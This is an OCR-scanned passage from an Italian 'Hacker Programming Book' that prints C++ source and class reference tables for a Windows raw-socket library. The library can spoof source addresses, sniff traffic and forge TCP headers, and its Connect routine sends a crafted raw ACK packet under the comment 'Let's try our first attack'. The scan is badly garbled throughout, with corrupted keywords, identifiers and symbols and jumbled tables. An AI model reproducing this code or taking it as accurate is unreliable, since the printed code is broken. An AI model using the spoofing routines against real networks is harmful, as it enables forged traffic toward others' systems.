Attach to a socket 



Bind to a speci fic 
address 

Calculate the data 
checksum 

Calculate the checksum 
for TCP and UDP 



Check this socket is 
valid 

Close the socket 
Create an IP header 



Create an IP header 



Create a socket 

Last stop before sending 
the header 

Get the socket handle 

Get the IP options 

Get the address of the 
remote connected system 

Get the port if the 
remote connected system 

initialize ali the 
private memebers 

Indication if we are a 
raw socket 

Reseolve DNS 

Recieve data from remote 
socket 

Resolve a DNS entry 
Send data to a socket 



Set the address in the IP 
header 



Do we allow options on 
this socket ? 

Set the protocol we are 
working on 

Are we a raw socket ? 

Set source address for 
spoofing 

Set the packet Time to 
live 

Close one way of the 
socket 

(receive, send, both) 
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virtual BOOL Sniff ( BOOL bSniff ) Turn to be a sniffer 

socket 

BOOL ValidAddress f LPCSTR lpAddress ) Check if an address 

valid 

BOOL ValidSocket () Is our socket valid 

Dalla classe precedente abbiamo la classi CTCPSocket e CTCPOptions : 

iinclude " Spoof Socket . h " 
iinclude "AsyncSocket . h " 

typedef struct _TCPHeader 
{ 

unsigned short SourcePort; 
unsigned short DestinationPort ; 
unsigned int SequenceNumber ; 
unsigned int AcknowledgeNumber ; 

unsigned char DataOffset; //Crappy MFC can't use bits 

unsigned char Flags; 
unsigned short Windows ; 
unsigned short Checksum; 
unsigned short UrgentPointer ; 
} TCPHeader; 



typedef TCPHeader FAR * LPTCPHeader; 

idefine TCPHeaderLength sizeof (TCPHeader) 

//Ali of the TCP header flags 
idefine TCPFlag_URG 0 
idefine TCPFlag_ACK 2 
idefine TCPFlag_PSH 4 
idefine TCPFlag^RST 8 
idefine TCPFlag_SYN 16 
idefine TCPFlag_FYN 32 

//TCP Options 

idefine TCPOptions_END 0 

idefine TCPOptions_NO_OPERATION 1 

idefine TCPOptions_MAX_Segment 2 

//Max segment size 

idefine TCPOptions_MAX_Segment_Length 4 



class CTCPOptions : protected CIPOptions 
{ 

public: 

//Add options Segment size 

void AddOption SegmentSize (unsigned short usMax) ; 

//Reset ali the data in the options 
void Reset () ; 



//Do we auto pad to a 4 bytes limit 
void SetAutoPad (BOOL bAutoPAD) ; 

//List terminator 

virtual void AddOption_ENDLIST () ; 

//Get the length of the options buffer 
int GetBufferLength () ; 

//Get the buffer itself 
const char* GetBufferf); 

//Add option nothing 

virtual void AddOption Nothing () ; 



//ctor and dtor 

CTCPOptions () ; 

virtual ~CTCPOptions () ; 



class CTCPSocket : public CSpoof Socket 
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{ 

public: 

//Send data over the sockets 
BOOL Sendfchar* buf,int bufLen) ; 

//Accept a connection, supply an already made socket 
BOOL Accept (CTCPSocket* tSok) ; 

//Accept a connection, create the socket class 
CTCPSocket * Accept () ; 

//Listen to incoming connections 
virtual BOOL Listen (int iBackLog) ; 

//Create this socket as a regular socket 
virtual BOOL CreateRegular ( ) ; 

//Get the class of the TCP options 
CTCPOptions* GetTCPOptions () ; 

//Connect to a remote system 

virtual BOOL Connect (int iSourcePort, LPCSTR lpDestinationAddress, int 
iDestinationPort) ; 

//Create as a raw socket 
virtual BOOL Create (); 

//Supply the class of TCP options 
void SetTCPOptions (BOOL bOptions) ; 

//et or and dtor 
CTCPSocket () ; 
virtual ~CTCP Socket () ; 
private: 

//Initialize the class 
void InitializeTCP () ; 

//Attach to a socket 
CTCPSocket (SOCKET sok) ; 

//Set flags in the header 

void SetHeaderFlag (LPTCPHeader lpHead, int iFlag) ; 
//Create the TCP header 

LPTCPHeader ConstructTCPHeader (int iSourcePort , int iDestinationPort , int 
iHeaderLength) ; 

//The TCP options 
CTCPOptions* m_TCPOptions ; 

//Do we ha ve options 
BOOL m_Options ; 

//Sequence in the TCP header 
static unsigned int m_Sequence; 
protected: 

//When the socket is accepted, what to do 
virtual void Accepted () ; 



// TCPSocket . epp 

^include "stdafx.h" 
iinclude "TCPSocket . h " 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

idefine CTCPSocket_LOGNAME "CTCPSocket" 
idefine CTCPOptions_LOGNAME "CTCPOptions" 

unsigned int CTCPSocket : :m_Sequence= (unsigned int) GetCurrentProcessIdf) ; 
CTCPSocket : : CTCPSocket () : CSpoof Socket () 
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SetName (CTCPSocket^LOGNAME) ; 
InitializeTCP () ; 

} 

ERROR_HANDLER ( "CTCPSocket ") 

ì 

CTCPSocket : : CTCPSocket (SOCKET sok) : CSpoof Socket (sok) 
{ 

try 
l 

SetName (CTCPSocket_LOGNAME) ; 
InitializeTCP () ; 

} 

ERROR_HANDLER ( "CTCPSocket ") 

} 

CTCPSocket : : ~CTCPSocket () 

{ 

} 

BOOL CTCPSocket : : Create () 
{ 

try 
{ 

SetProtocol (IPPROTO_TCP) ; 

return CSpoof Socket : : Create (IPPROTO_IP) ; 

} 

ERROR_HANDLER_RETURN ( "Create ", FALSE) 

ì 

BOOL CTCPSocket : :Connect (int iSourcePort, LPCSTR lpDestinationAddress , int 

iDestinationPort) 

{ 

try 
{ 

//Quit if not ok 
if C !CheckSocketValid() ) 
return FALSE; 

if (isRawf)) 
{ 

//Let 's try our first attack 
LPTCPHeader lpHead; 

//Header length 

int iHeaderLength ; 

iHeaderLength=TCPHeaderLength; 

//If we have TCP options 
if (in_Options) 

iHeaderLength+=m_TCPOptions->GetBufferLength () ; 

//Create the header 

lpHead=ConstructTCPHeader (iSourcePort , iDestinationPort , iHeaderLength) ; 

//Set the flags 

SetHeaderFlag (lpHead, TCPFlag_ACK) ; 

//Result 
BOOL hResult; 

/ /Construct diffrently if we have options 

if (m_Options) 

{ 

char* buf; 

buf=new char [iHeaderLength] ; 
//Copy header 

memcpy (buf, lpHead, TCPHeaderLength) ; 
//Copy options 

memcpy (buf+TCPHeaderLength,m__TCPOptions- 
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//Checksum it 
lpHead- 

>Checksum=CalculatePseudoChecksum (buf, iHeaderLength, lpDestinationAddress, iHeaderLength 

); 

//Recopy header 

memcpy (buf, lpHead, TCPHeaderLength) ; 
//Send the data 

bResult=CSpoof Socket : : Send (lpDestinationAddress , buf , iHeaderLength) ; 

//Dispose 
delete buf; 

} 

else 
l 

lpHead- 

>Checksum=CalculatePseudoChecksum ( (char*) lpHead, TCPHeaderLength, lpDestinationAddress, T 
CPHeaderLength) ; 

//Send the data 

bResult=CSpoof Socket : : Send (lpDestinationAddress, (char*) lpHead, TCPHeaderLength) ; 
} 

//Set the last error 
SetLastError ( "Connect ") ; 

//Dispose the header 
delete lpHead; 

return bResult; 

} 

else 
{ 

//Set async notification 
int iResult; 

//Create the address 
sockaddr_in soSrc; 

//Set to 0 

memset (SsoSrc, 0, sizeof (soSrc) ) ; 
soSrc. sin_family=AF_INET; 

soSrc. sin_addr . s_addr=inet_addr (lpDestinationAddress) ; 
soSrc. sin_port=htons (iDestinationPort) ; 

iResult=connect (GetHandle () , (sockaddr*) SsoSrc, sizeof (soSrc) ) ; 

//Check the result 

if (iResult==SOCKET__ERROR) 

{ 

//Check is it blocking error so we can ignore 
if (WSAGetLastError () ! =WSAEWOULDBLOCK ) 
SetLastError ( "Connect ") ; 

else 

iResul t = ! SOCKET_ERROR; 

} 

else 

SetLastError ( "Connect ") ; 

if (iResult ! =SOCKET_ERROR) 

//Save where we are connected 
m_ConnectedTo=soSrc ; 

return iResult ! =SOCKET_ERROR; 

) 

} 

ERROR_HANDLER_RETURN ( "Connect ", FALSE) 

) 

LPTCPHeader CTCPSocket : : ConstructTCPHeader (int iSourcePort, int iDestinationPort , int 
iHeaderLength) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



//Construct the header 
LPTCPHeader lpHead=new _TCPHeader; 



//Set source and destination port 
lpHead->SourcePort=htons (iSourcePort) ; 
lpHead->DestinationPort=htons ( IDestinationPort ) ; 



//No checksums yet 
lpHead— >Checksum=0 ; 



//Set Windows to 3 . Ok 
lpHead->Windows=htons (512) ; 

//Set the packet number 
lpHead— >AcknowledgeNumber=0 ; 

//And the sequence 

lpHead— >SequenceNumber=htonl (m Sequence++) ; 
//Data offset 

lpHead->DataOffset= (iHeaderLength/4) « 4; 
//Flags 

lpHead->Flags=0 ; 

//Urgent pointer 
lpHead->UrgentPointer=0 ; 

//Return it to the user 
return lpHead; 

} 

ERROR_HANDLER_RETURN ( "Construct TCPHeader ", NULL) 



} 



void CTCPSocket :: SetHeaderFlag (LPTCPHeader lpHead, int iFlag) 
{ 

//Logicai or 
lpHead->Flags / =iFlag; 

} 

void CTCPOptions :: Reset () 
{ 

try 
{ 

CIPOptions : : Reset () ; 

} 

ERROR_HANDLER ( "Reset ") 

ì 

void CTCPOptions: : SetAutoPad (BOOL bAutoPAD) 
{ 

try 
{ 

CIPOptions : : SetAutoPad (bAutoPAD) ; 

} 

ERROR_HANDLER ( "SetAutoPad") 

) 



void CTCPOptions: :AddOption_ENDLIST() 
{ 

try 
{ 

//Add option end list 
tOptionType OT; 

//Get the option 
OT=TCPOptions_END; 

//Add it to buffer 

AddToBuffer ( (char*) &0T, sizeof (OT) ) ; 

} 

ERROR_HANDLER ( "AddOpti on_ENDLIST " ) 

) 



int CTCPOptions : : GetBufferLength () 
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try 
{ 

return ClPOptlons : : GetBufferLength () ; 

} 

ERROR_HANDLER_RETURN ( "GetBufferLength " , 0) 

ì 

const char* CTCPOptions : : GetBuffer ( ) 
{ 

try 
{ 

return ClPOptlons : : GetBuffer () ; 

} 

ERROR_HANDLER_RETURN ( "GetBuffer ", NULL) 

ì 

void CTCPOptions : :AddOption_Nothing() 
{ 

try 
{ 

//Add option do nothing 
tOptionType OT; 

//Get the option 
OT=TCPOptions_NO_OPERATION; 

//Add it to buffer 

AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

} 

ERROR_HANDLER ( "AddOption_Nothing" ) 

) 

CTCPOptions : : CTCPOptions () : CIPOptions () 
{ 

try 
{ 

SetName ( CTCPOpt i on sLOGNAME ) ; 

} 

ERROR_HANDLER ( "CTCPOptions ") 

) 

CTCPOptions : : ~CTCPOptions ( ) 

{ 

} 

void CTCPOptions: :AddOption SegmentSize (unsigned short usMax) 
{ 

try 
{ 

//Add option Max segment 
tOptionType OT; 

//Get the option 
OT=TCPOptions_MAX_Segment; 

//Add it to buffer 

AddToBuffer ( (char*) &0T, sizeof (OT) ) ; 
//Add length 

OT=TCPOptions_MAX_Segment_Length ; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

//Add segment size 
unsigned short usOT; 
usOT=htons (usMax) ; 

AddToBuffer ( (char*) SusOT, sizeof (usOT) ) ; 

} 

ERROR_HANDLER ( "AddOption_SegmentSize ") 



} 

void CTCPSocket : : SetTCPOptions (BOOL bOptions) 
{ 

try 
{ 

//Do we want options , normaly not 
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if (m_TCPOptions) 
{ 

delete m_TCPOptions; 
m_TCPOptlons=NULL; 

ì 

if (bOptions) 

m_TCPOptions=new CTCPOptions ; 

} 

ERROR^HANDLER ( "SetTCPOptions ") 

ì 

CTCPOptions* CTCPSocket : : GetTCPOptians () 
{ 

return m_TCPOptions; 

} 

BOOL CTCPSocket : : CreateRegular () 
{ 

try 
{ 

SetProtocol (IPPROTO_TCP) ; 

return CSpoof Socket : : Create ( IPPROTO_TCP ) ; 

} 

ERROR_HANDLER_RETURN ( "CreateRegular ", FALSE) 

ì 

BOOL CTCPSocket : :Listen (int iBackLog) 
{ 

try 
{ 

//Quit if not ok 
if ( !CheckSocketValid() ) 
return FALSE; 

int iResult; 

iResult=listen (GetHandle () , iBackLog) ; 

if (iResult) 

SetLastError ( "Listen ") ; 

return HResult; 

} 

ERROR^HANDLER RETURN ( "Listen ", FALSE) 



CTCPSocket* CTCPSocket : :Accept () 
{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 

//First accept the socket 
SOCKET sok; 

//Where we are connected to 
sockaddr_in saConnected; 

//Size of the structure 
int iTmp; 

iTmp=sizeof (saConnected) ; 
//Accept it 

sok=accept (GetHandle () , (sockaddr*) SsaConnected, SiTmp) ; 

if (sok!=INVALID_SOCKET) 
{ 

/ /Create the new tcp socket 
CTCPSocket* tSok; 
tSok=new CTCPSocket (sok) ; 

//Set the address 
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return tSok; 

} 

else 
{ 

//Error 

SetLastError ( "Accept ") ; 
return NULL; 

} 

} 

ERROR_HANDLER_RETURN ( "Accept ", NULL) 

ì 

void CTCPSocket : : InitializeTCP () 
{ 

try 
{ 

//No options 
m_TCPOptions=NULL; 

SetTCPOptions (FALSE) ; 

} 

ERROR_HANDLER ( "InitializeTCP ") 

) 

BOOL CTCPSocket : : Accept (CTCPSocket *tSok) 
{ 



try 
{ 



//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 

//First accept the socket 
SOCKET sok; 

//Where we are connected to 
sockaddr_in saConnected; 

//Size of the structure 
int ITmp; 

iTmp=sizeof (saConnected) ; 



//Accept it 

sok=accept (GetHandle () , (sockaddr*) SsaConnected, SiTmp) ; 

if (sok!=INVALID_SOCKET) 
{ 

//Set the socket data 
tSok->m_ConnectedTo=saConnected; 
tSok->AssignSocket (sok) ; 
tSok->Accepted ( ) ; 



return TRUE; 

} 

else 
{ 

/ /Error 

SetLastError ( "Accept ") ; 
return FALSE; 

) 

} 

ERROR_HANDLER_RETURN ( "Accept ", FALSE) 

) 



BOOL CTCPSocket : : Sendfchar *buf,int bufLen) 
{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 



//Send the data 
int iResult; 
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lResult=send (GetHandle () , buf, bufLen, NULL) , 
ret urn iResul t ; 



} 

ERROR_HANDLER_RETURN ( "Send ", FALSE) 



} 



void CTCPSocket : :Accepted() 

{ 

} 



Base C 1 a s s e s 



CSpoof Socket 



Data I t e m s 



BOOL m_Options 
static unsigned int m_Sequence 
CTCPOptions * m_TCPOptlons 



Do we have options 
Sequence in the TCP header 
The TCP options 



Constructors 



CTCPSocket < SOCKET sok ) 
CTCPSocket () 



Attach to a socket 
ctor and dtor 



Destructors 



virtual 



-CTCPSocket {) 



Functions 



BOOL 

CTCPSocket * 
virtual void 
virtual BOOL 

LPTCPHeader 

virtual BOOL 
virtual BOOL 

CTCPOptions * 

void 

virtual BOOL 

BOOL 
void 

void 



Accept ( CTCPSocket* tSok ) 
Accept () 
Accepted ( ) 

Connect ( int iSourcePort, LPCSTR 
lpDestinationAddress , int 
iDestinationPort ) 

Construct TCPHeader ( int iSourcePort, 
int iDestinationPort, int 
iHeaderLength ) 

Create () 

CreateRegular ( ) 

GetTCPOptions () 

InitializeTCP Q 
Listen ( int iBackLog ) 

Send ( char* buf, int bufLen ) 

SetHeaderFlag ( LPTCPHeader lpHead, 
int iFlag ) 

Set TCPOpt ions ( BOOL bOptions ) 



Accept a connection, supply 
an already made socket 

Accept a connection, create 
the socket class 

When the socket is 
accepted, what to do 

Connect to a remote system 



Create the TCP header 



Create as a raw socket 

Create this socket as a 
regular socket 

Get the class of the TCP 
options 

Initialize the class 

Listen to incoming 
connections 

Send data over the sockets 
Set flags in the header 

SuddIv the class of TCP 
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options 



Base C 1 a s s e s 



CIPOptions 



Constructors 



CTCPOptions () 



ctor and dtor 



Destructors 



virtual 



-CTCPOptions () 



Functions 



virtual void 
virtual void 
void 

const char * 
int 

void 

void 



AddOption_ENDLIST () 
AddOptionNothing ( ) 



List terminator 
Add option nothing 



AddOption_SegmentSize ( unsigned short Add options Segment size 
usMax ) 



GetBuffer Q 
GetBufferLength () 

Reset () 

SetAutoPad( BOOL bAutoPAD ) 



Get the buffer itself 

Get the length of the options 
buffer 

Reset ali the data in the 
options 

Do we auto pad to a 4 bytes 
limit 



La successiva classe è la seguente CAsyncSocket: 



iinclude "SpoofBase . h" 
iinclude <map> 

//Message handlers 
idefine WM_BASE 
idefine WM_SOCKET_GENERAL 
idefine WM__SOCKET__ACCEPT 
idefine WM_SOCKET_CONNECT 
idefine WM__SOCKET_TIMEOUT 



WM_USER 



WMBASE+l 
MM_BASE+2 
fìM_BASE+3 
WM BASE+4 



//Definitions for no messaging 
idefine NO_OnSocketTimeout virtual 
idefine NO_OnSocketConnect virtual 
TRUE; } 

idefine NOOnSocketAccept 
TRUE; } 

idefine NO OnSocketClose virtual 
idefine NO_OnSocketOOB virtual 
idefine NO_OnSocketWrite virtual 
idefine NO_OnSocketReceive virtual 
TRUE; } 



BOOL OnSocketTimeout ( ) (return TRUE;} 

BOOL OnSocketConnect ( int iErrorCode) {return 



virtual BOOL OnSocketAccept (int iErrorCode) {return 



BOOL OnSocketClose (int iErrorCode) {return TRUE;) 
BOOL OnSocketOOB (int iErrorCode) (return TRUE;} 
BOOL OnSocketWrite (int iErrorCode) (return TRUE;} 
BOOL OnSocketReceive (int iErrorCode) (return 



idefine SOCKET__WINDOW_NAME "Socket notification sink" 
//Window class name 

idefine CAsyncSocketClass "CAsyncSocketClass" 
idefine CAsyncShutdown_Class " CAsyncShutdown " 

class CSocketThreadtianager ; 

class CAsyncSocket : protected CSpoofBase 
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{ 

public: 

/ /Initialize ali the handlers 
static void Initialize () ; 

//Indicate a system shutdown 
static void Shutdown () ; 

//Disable the time 
BOOL KillTimerO ; 

//Create a timeout 

BOOL SetTimeout (int itds) ; 

//Set the instace of our app 

static void Setlnstance (HINSTANCE hlnst) ; 

//ctor and dtor 
CAsyncSocket () ; 
virtual ~CAsyncSocket ( ) ; 
protected: 

//Messaging methods 

virtual BOOL OnSocketTimeout () =0 ; 

virtual BOOL OnSocketConnect (int iErrorCode) =0; 

virtual BOOL OnSocketAccept (int iErrorCode) =0 ; 

virtual BOOL OnSocketClose (int iErrorCode) =0; 

virtual BOOL OnSocketOOB (int iErrorCode) =0; 

virtual BOOL OnSocketWrite (int iErrorCode) =0; 

virtual BOOL OnSocketReceive (int iErrorCode) =0; 

//Get the ID of the socket 
int GetSocketlD () ; 

//Get the handle of the window 
HWND GetWindowHandle () ; 

//Get the socket handle 

virtual SOCKET GetAsyncHandle ( ) =0 ; 

//Go to async regular mode 
virtual BOOL Set Async () =0 ; 

//Remove the socket from the list 
void RemoveSocketFromList () ; 

//Add the socket to the list 
void AddSocketToList () ; 

//Do we have a timeout 
BOOL IsTimeout () ; 
private: 

typedef std: : less<int> SocketLess; 

typedef std: :map<int , CAsyncSocket*, SocketLess> SocketMap; 
private: 

//Remove from thread info 
void DeAllocateHandle () ; 

/ /Allocate ourself a window 
void AllocateHandle () ; 

//Get our thread manager (global or locai) 
CSocketThreadManager* GetThreadManager () ; 

//Remove the handlers 

static BOOL RemoveHandlers () ; 

//Get the instance of our APP 
static HINSTANCE Getlnstance () ; 

/ /Create our handlers 
static BOOL SetHandlers () ; 

//Register our window 

static BOOL RegisterWindow () ; 
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static CAsyncSocket* GetSocketBylD (int ISocklD) ; 

//Our list of sockets 

static SocketMap m__SocketMap ; 

//Do we iiave a window handle 
static BOOL mWindow; 

//Our window 's handle 
static HWND mWindowHandle; 

/ /Instance of our window 
static HINSTANCE tn_Instance; 

//Are we initialized 
static BOOL m_Initialized; 

//ID of our socket 
int m_SocketID; 

//Are we in the list 
BOOL m_List; 

//Timeout indicator 
BOOL m_Timeout ; 

//Our window 's handle 
HWND m_hLocalWindowHandle; 

//Are we shutting down 
static BOOL m_bShuttingDown; 

//Our thread manager (global) 

static CSocketThreadManager* m_pThreadManager ; 

//Our locai thread manager (to allow custom thread mangement) 
CSocketThreadManager* m_pLocalThreadManager ; 
private: 

//Our shutdown class (ali of this to avoid father to know his sons) 

class CAsyncShutdown : protected CSpoofBase 

{ 

public: 

CAsyncShutdown () ; 
virtual ~CAsyncShutdown ( ) ; 
protected: 

//Shutdown notifier 

virtual void Noti fyShut down () ; 

}; 

private: 

//Our window proc 

static LRESULT CALLBACK SocketMessageHandler (HWND hwnd, // handle to 

window 

UINT 

uMsg, // message identifier 

WPARAM wParam, // first message parameter 

LPARAM IParam); 



// CasyncSocket . cpp 

iinclude "stdafx.h" 
iinclude "AsyncSocket . h " 
iinclude " SocketThreadManager . h " 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 
//Static members 

BOOL CAsyncSocket : : m_Window=FALSE ; 

HWND CAsyncSocket : : m_WindowHandle=0 ; 

HINSTANCE CAsyncSocket : :m_lnstance=0 ; 

BOOL CAsyncSocket : :m lnitialized=0; 

CAsyncSocket : : SocketMap CAsyncSocket : ^SocketMap; 
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CSocketThreadManager* CAsyncSocket : :m_pThreadManager=NULL; 
BOOL CAsyncSocket : :m_bShuttingDown=FALSE; 

CAsyncSocket :: CAsyncSocket ( ) : CSpoofBaseO 
{ 

try 
{ 

//Initialize memebers 
m_List =FALSE; 
m_ Timeout =FALSE; 

//No locai controller 
m_pLocal ThreadManager=NULL ; 

//And no window handle 
m_hLocalWindowHandle=0 ; 

//Initialize ali data 
Initialize () ; 

HANDLER ( "CAsyncSocket ") 



} 

ERROR 



CAsyncSocket : : ~CAsyncSocket () 
{ 

try 
{ 

if (GetThreadManager () ) 

//Remove from the thread manager 

GetThreadManager ( ) ->DecreaseSocketCount (GetWindowHandle () ) ; 



} 

ERROR_HANDLER ( "~CAsyncSocket ") 



BOOL CAsyncSocket : : SetHandlers () 
{ 

try 
{ 

//First create the window class 
if ( !m_ Window) 

if ( ! RegisterWindow () ) 

{ 

//Error 

ReportStaticError (CAsyncSocket_Class, "SetHandlers", "Error 
registering the window, please check API error!"); 

return FALSE; 

} 

else 

//Check if we need to register a locai window, or a 

thread manager ? 

if (CSpoofBase : : IsMultiThreaded () ) 

//Initialize as multithreaded 
m pThreadManager=new 
CSocketThreadManager (CSpoofBase : : GetNumberOfThreads () , m_Instance) ; 

else 

{ 

//Run on main thread 



m_WindowHandle=CreateWindowEx (0, CAsyncSocket_Class, SOCKET_WINDOW_NAME , 



WS^OVERLAPPED, 0, 0, 0, 0, 0, NULL, Getlnstance () , NVLL) ; 

//Check the value of the window 

if ( !m_WindowHandle) 

{ 

//Error 



ReportStaticError (CAsyncSocket_Class, "SetHandlers" , "Error creating the window, 
please check API errori"); 

return FALSE; 

} 

else 

//We have a window 
m_Window=TRUE ; 

) 
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//Success 
return TRUE; 

} 

ERROR_HANDLER_STATIC_RETURN ( CAsyncSocket Class, "CAsyncSocket ", FALSE) 

} 

HINSTANCE CAsyncSocket : : Getlnstance ( ) 
{ 

//Returns the instance of the application, must be overided 
return m_Instance; 

ì 

void CAsyncSocket : : AddSocketToList () 
{ 

try 
{ 

//Allocate our window 
AllocateHandle () ; 

//Add socket to list 
m_SocketID=GetAsyncHandle () ; 

m_SocketMap . insert (SocketMap : : value_type (m_SocketID , this) ) ; 
m_List=TRUE; 

} 

ERROR_HANDLER ( "AddSocketToList ") 



} 



int CAsyncSocket : : GetSocketlD ( ) 
i 

return m_SocketID; 

ì 

CAsyncSocket* CAsyncSocket :: GetSocketBylD (int iSocklD) 
{ 

try 
{ 

//Find the socket 

SocketMap: : iterator aThelterator ; 
aTheIterator=m SocketMap . find (iSocklD) ; 

//Check if we have it 
if (aThelterator ! =m_SocketMap . end() ) 
return aTheIterator->second; 

else 

return NULL; 

} 

ERROR_HANDLER_STATIC__RETURN(CAsyncSocket_Class, "GetSocketBylD ", NULL) 



) 



BOOL CAsyncSocket : -.RegisterWindow () 
{ 

try 
{ 

WNDCLASS tre; 



*/ 
*/ 



/* Fili in window class structure with parameters that describe the 
/* main window. 



wc.style = 0; 

/* Class style(s). */ 
wc . lpfnWndProc = (WNDPROC) SocketMessageHandler; /* Function to 

retrieve messages for */ 

/* 

Windows of this class. */ 

wc . cbClsExtra = 0; /* No per-class extra data. 

*/ 

wc . cbWndExtra = 0; /* No per— window extra data. 

*/ 

wc . hlcon = NULL; /* Icon name front .RC 

*/ 

wc.hlnstance = Getlnstance () ; /* Application that owns the 

class. */ 

wc.hCursor = NULL; 



•UL1 
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wc . IpszMenuName = NULL; /* Name of menu resource in .RC file. */ 
wc. IpszClassName = CAsyncSocket_Class ; /* Name used in cali to 
CreateWindow. */ 

/* Register the window class and return success/ f allure code. */ 
return (RegisterClass (Swc) ) ; 

} 

ERROR_HANDLER_STATIC_RETURN(CAsyncSocket_Class, "RegisterWindow ", FALSE) 

ì 

void CAsyncSocket : : Setlnstance (HINSTANCE hlnst) 
{ 

m_lnstance=hlnst ; 

ì 

BOOL CAsyncSocket : : RemoveHandlers () 
{ 

try 
{ 

//First shut down the Windows 

if (m Window) 

{ 

if ( ÌDestroyWindow (m WindowHandle) ) 
return FALSE; 

if ( ! UnregisterClass (CAsyncSocket_Class, Getlnstance () ) ) 
return FALSE; 

ì 

m_Window=FALSE ; 
m_WindowHandle=NULL; 

return TRUE; 

} 

ERROR_HANDLER_STATIC_RETURN ( CAsyncSocket Class, "RemoveHandlers ", FALSE) 



} 



HWND CAsyncSocket : : GetWindowHandle ( ) 
{ 

//Check if we are multithreaded ? 
return m hLocalWindowHandle; 

) 

void CAsyncSocket : : RemoveSocketFromList () 
{ 

try 
{ 

if (m_List) 

m_SocketMap . erase (GetSocketlD ( ) ) ; 

) 

ERROR_HANDLER ( "RemoveSocketFromList ") 

) 

BOOL CAsyncSocket : : SetTimeout (int itds) 
{ 

try 
{ 

if (! GetWindowHandle ( ) Il m_Timeout) 
return FALSE; 

//Set the timer 

m_Timeout=SetTimer (GetWindowHandle ( ) , GetAsyncHandle () , iMs, NULL) ; 
return m Timeout; 

} 

ERROR_HANDLER_RETURN ("Set Timeout " , FALSE) 

) 

BOOL CAsyncSocket: -.KillTimer () 
{ 

try 
{ 

if (! GetWindowHandle ( ) Il !m_Timeout) 
return FALSE; 
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return ! mTimeout ; 

} 

ERROR_HANDLER_RETURN ( "KlllTimer ", FALSE) 



void CAsyncSocket : : Shutdown ( ) 
{ 



try 
l 



//Indicate we 're shutting down 
m_bShuttingDown=TRUE; 

//Clear the map 

SocketMap: : iterator aThelterator; 
aTheIterator=m_SocketMap . begin () ; 

//While not end of the map 

while (aThelterator ! =m_SocketMap . end() ) 

{ 

//Delete the socket 

delete aTheIterator->second; 

//Go to the next socket 
++aTheIterator; 



//Wait for clean up 
Sleep(lOOO) ; 

//Delete the thread manager 
if (m__pThreadtianager) 

delete m _pThreadManager ; 

//Remove the handlers 
RemoveHandlers () ; 



} 

ERROR_HANDLER_STATIC (CAsyncSocket^Class, "Shutdown ") 



} 



CAsyncSocket : : CAsyncShutdown : : CAsyncShutdown () : CSpoofBase () 
{ 

try 
{ 

//Register myself 

SetName (CAsyncShutdown_Class ) ; 

//Register for shutdown 
RegisterShutdown (this) ; 

} 

ERROR_HANDLER ( "CAsyncShutdown ") 

} 

CAsyncSocket : : CAsyncShutdown : : ~CAsyncShutdown ( ) 

{ 

} 

void CAsyncSocket : : CAsyncShutdown : :NotifyShutdown () 
{ 

try 
{ 

/ / Socket shut down ! 
CAsyncSocket : : Shutdown () ; 

} 

ERROR_HANDLER ( "NotifyShutdown ") 

ì 

BOOL CAsyncSocket :: IsTimeout () 
{ 

return m_Timeout; 

ì 

void CAsyncSocket : : Initialize () 
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//Initialize ali data 
if ( !m_Initialized) 
{ 

//Create handlers 
if (!SetHandlers() ) 

ReportStaticError (CAsyncSocket_Class , "CAsyncSocket " , "Failed to init 
handlers ! ") ; 

//Create a new socket to do the shutdown 
CAsyncShutdown* pShutdown; 
pShutdown=new CAsyncShutdown; 

//The class registers itself 
m_Initialized=TRUE; 

} 

} 

ERROR_HANDLER_STATIC (CAsyncSocket_Class, "Initialize ") 

ì 

//Message handler 

LRESULT CALLBACK CAsyncSocket : : SocketMessageHandler (HWND hwnd, // handle to 

window 

UINT uMsg, // message identifier 

WPARAM wParam, // first message parameter 
LPARAM lParam) // second message parameter 

< 

if (m_bShuttingDown) 
return TRUE; 

try 
{ 

//first get the socket 
CAsyncSocket* cSock; 

cSock=GetSocketByID ( (int) wParam) ; 

if (cSock) 

//Socket exists 
switch (uMsg) 
{ 

case WM_SOCKET_GENERAL: 

if (WSAGETSELECTEVENT (lParam) == FD_READ) 
return cSock- 
>OnSocketReceive (WSAGETSELECTERROR (lParam) ) ; 

else if (WSAGETSELECTEVENT (lParam) == FD_WRITE) 
return cSock- 
>OnSocketWrite (WSAGETSELECTERROR (lParam) ) ; 

else if (WSAGETSELECTEVENT (lParam) == FD_OOB) 
return cSock- 
>OnSocketOOB (WSAGETSELECTERROR (lParam) ) ; 

else if (WSAGETSELECTEVENT (lParam) == FD_CLOSE) 
return cSock- 
>OnSocketClose (WSAGETSELECTERROR (lParam) ) ; 

break; 
case WM_SOCKET_CONNECT : 

if (WSAGETSELECTEVENT (lParam) == FD_ CONNECT) 
return cSock- 
>OnSocketConnect (WSAGETSELECTERROR (lParam) ) ; 

break; 
case WM_SOCKET__ACCEPT: 

if (WSAGETSELECTEVENT (lParam) == FD_ACCEPT) 
return cSock- 
>OnSocketAccept (WSAGETSELECTERROR (lParam) ) ; 

break; 
case WM_TIMER: 

//Inform the socket 
return cSock->OnSocketTimeout () ; 
default : /* Passes it on if unproccessed 

*/ 

return (int) (DefWindowProc (hwnd, uMsg, wParam, lParam)); 
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else 

return (int) (DeffiindowProc (hwnd, uMsg, wParam, IParam) ) ; 
ret urn TRUE; 

} 

ERROR_HANDLER_STATIC_RETURN(CAsyncSocket_Class, "SocketMessageHandler" , TRUE) 



CSocketThreadManager* CAsyncSocket : : GetThreadManager ( ) 
{ 

if (!m jpLocalThreadManager) 

ret urn m_pThreadManager ; 

else 

return m_pLocalThreadManager ; 



void CAsyncSocket: -.AllocateHandle () 
{ 

try 
{ 

if (GetThreadManager () ) 
//We are 

m_hLocalWindowHandle=GetThreadManager ( ) ->GetWindowHandle () ; 

else 

//Single threaded 

m_hLocalWindowHandle=m WindowHandle ; 

} 

ERROR_HANDLER ( "AllocateHandle ") 



void CAsyncSocket: :DeAllocateHandle () 
{ 

} 



Base C 1 a s s e s 



CSpoofBase 



Data I t e m s 



static BOOL 
HWND 

static BOOL 
